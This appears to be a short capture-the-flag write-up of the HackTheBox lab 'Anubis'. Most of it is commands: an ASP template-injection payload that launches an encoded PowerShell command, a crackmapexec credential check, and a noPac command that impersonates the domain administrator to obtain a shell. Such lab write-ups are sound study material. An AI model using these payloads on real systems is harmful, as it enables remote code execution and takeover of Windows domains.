ASP, Windows Containers, Responder & NoPAC - Anubis @ HackTheBox
We are solving Anubis, a 50-point windows machine on HackTheBox which involves an ASP template injection, windows containers, and stealing hashes with Responder. Later we’ll escalate privileges using noPAC.
Notes
ASP Injection
1
<% CreateObject("WScript.Shell").Exec("powershell -enc ...") %>
noPAC
1
2
3
4
# https://github.com/Ridter/noPac
proxychains -q crackmapexec smb 172.31.48.1 -u localadmin -p 'Secret123!' --no-bruteforce
sudo date -s "$(curl -sI https://windcorp.htb -k | grep -i '^date:'|cut -d' ' -f2-)"
proxychains -q python3 noPac.py windcorp.htb/localadmin:'Secret123' -dc-ip 172.31.48.1 -dc-host EARTH -shell --impersonate administrator
This post is licensed under CC BY 4.0 by the author.